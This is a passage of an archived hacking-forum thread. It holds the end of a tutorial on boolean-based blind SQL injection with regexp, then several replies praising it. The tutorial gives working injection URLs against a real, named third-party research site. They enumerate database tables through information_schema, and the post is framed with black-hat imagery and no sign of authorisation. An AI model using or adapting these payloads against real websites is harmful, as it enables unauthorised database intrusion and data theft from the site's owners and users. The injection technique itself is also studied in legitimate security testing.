class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 6=(select count(*) from information_schema.tables where 
table_schema!='information_schema' and table_name regexp '^t' limit 
0,1)-- -</code></div></div><br>This way we know there are all together 6 tables in database() starting with letter <span style="color: #32CD32;">t</span>. We can use also alternative syntax (<span style="color: #FFA500;"><span style="font-weight: bold;">not so effective</span></span> than that before as we need more executions with increasing limit part each time like limit 1,1 than limit 2,1 than 3,1 ...):<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.tables where 
table_schema!='information_schema' and table_name regexp '^t' limit 
1,1)-- -</code></div></div><br><br>Result after all executions will be the same. We get result <span style="color: #32CD32;">true</span>
 for command with limit 1,1 than 2,1 than 3,1 than 4,1 than 5,1 --&gt; 
all together (with limit 0,1 - our first table starting with <span style="color: #32CD32;">t</span>) this gives us total number of 6 tables.<br><br><span style="font-weight: bold;"><span style="color: #FF0000;">As we saw boolean based blind SQLi is very time consuming.</span></span>
 That is why many people use tools while injecting a site using the 
blind method. Still it is good to understand what is going on behind the
 scene <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>In next <a href="http://www.hackforums.net/showthread.php?tid=3387759" target="_blank">part #3</a> of this tutorial we will search for characters in column names using boolean based blind SQLi with regexp and binary search.<br><br><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_31772710"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31772710" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31802173" id="pid31802173"></a><table class="tborder" style="margin-top: 5px; " id="post_31802173" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-07-2013, 12:53 PM <span id="edited_by_31802173"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31802173#pid31802173">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1758777"><span class="group2">FireKode</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 11<br>Joined: Apr 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1758777"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31802173">nice tutorial and very useful for begginer :D</div><div class="post_meta" id="post_meta_31802173"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1758777" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31802173" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31822924" id="pid31822924"></a><table class="tborder" style="margin-top: 5px; " id="post_31822924" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-08-2013, 10:03 AM <span id="edited_by_31822924"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31822924#pid31822924">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1263159"><span class="group2">Vivek_s</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 19<br>Posts: 404<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1263159"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31822924">As always Good Info ajkaro<br><br>Thanks for the tutorial</div><div class="post_meta" id="post_meta_31822924"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1263159" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31822924" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31837039" id="pid31837039"></a><table class="tborder" style="margin-top: 5px; " id="post_31837039" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-08-2013, 09:39 PM <span id="edited_by_31837039"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31837039#pid31837039">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852281"><span class="group2">Patalach</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 69<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=852281"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31837039">Very nice tut ajkaro. High quality.<br>Thank you.</div><div class="post_meta" id="post_meta_31837039"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=852281" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31837039" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31838258" id="pid31838258"></a><table class="tborder" style="margin-top: 5px; " id="post_31838258" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-08-2013, 11:31 PM <span id="edited_by_31838258"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31838258#pid31838258">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1327920"><span style="color:#383838">Catzbow</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1327920" title="Away"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 155<br>Posts: 1,741<br>Joined: Dec 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1327920"><strong class="reputation_negative">-23</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/donator.png" alt="Emerald Donator" title="Emerald Donator"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/symbol-dollar_24.png" alt="Rich Bitch" title="Rich Bitch"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31838258"><blockquote><cite><span>(04-07-2013 12:53 PM)</span>FireKode Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31802173#pid31802173" class="quick_jump">►</a></cite>nice tutorial and very useful for begginer :D</blockquote><br>And what do you think you are? A beginner.</div><div class="post_meta" id="post_meta_31838258"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1327920" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31838258" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31931835" id="pid31931835"></a><table class="tborder" style="margin-top: 5px; " id="post_31931835" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-13-2013, 03:06 AM <span id="edited_by_31931835"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31931835#pid31931835">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=504654"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/neongreenglow.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=504654"><span class="group2">lionkidd</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 12<br>Posts: 313<br>Joined: Oct 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=504654"><strong class="reputation_positive">3</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31931835"><span style="color: #00BFFF;"><br>STICKY STICKY STICKY STICKY!<br>This should be moved to the "Premium Tutorials" section!<br>Great tutorial! Speeds blind SQLi up!<br></span></div><div class="post_meta" id="post_meta_31931835"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=504654" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31931835" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31991157" id="pid31991157"></a><table class="tborder" style="margin-top: 5px; " id="post_31991157" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-15-2013, 10:50 AM <span id="edited_by_31991157"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;pid=31991157#pid31991157">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,182<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31991157"><blockquote><cite><span>(04-07-2013 12:53 PM)</span>FireKode Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31802173#pid31802173" class="quick_jump">►</a></cite>nice tutorial and very useful for begginer :D</blockquote><br><blockquote><cite><span>(04-08-2013 10:03 AM)</span>Vivek_s Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31822924#pid31822924" class="quick_jump">►</a></cite>As always Good Info ajkaro<br><br>Thanks for the tutorial</blockquote><br><blockquote><cite><span>(04-08-2013 09:39 PM)</span>Patalach Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31837039#pid31837039" class="quick_jump">►</a></cite>Very nice tut ajkaro. High quality.<br>Thank you.</blockquote><br><blockquote><cite><span>(04-13-2013 03:06 AM)</span>lionkidd Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31931835#pid31931835" class="quick_jump">►</a></cite><span style="color: #00BFFF;"><br>STICKY STICKY STICKY STICKY!<br>This should be moved to the "Premium Tutorials" section!<br>Great tutorial! Speeds blind SQLi up!<br></span></blockquote><br>Thanks for your feed back guys... <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_31991157"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210&amp;replyto=31991157" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3387210&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387210" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3387210">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3387210" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3387210&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3387210.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%232%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->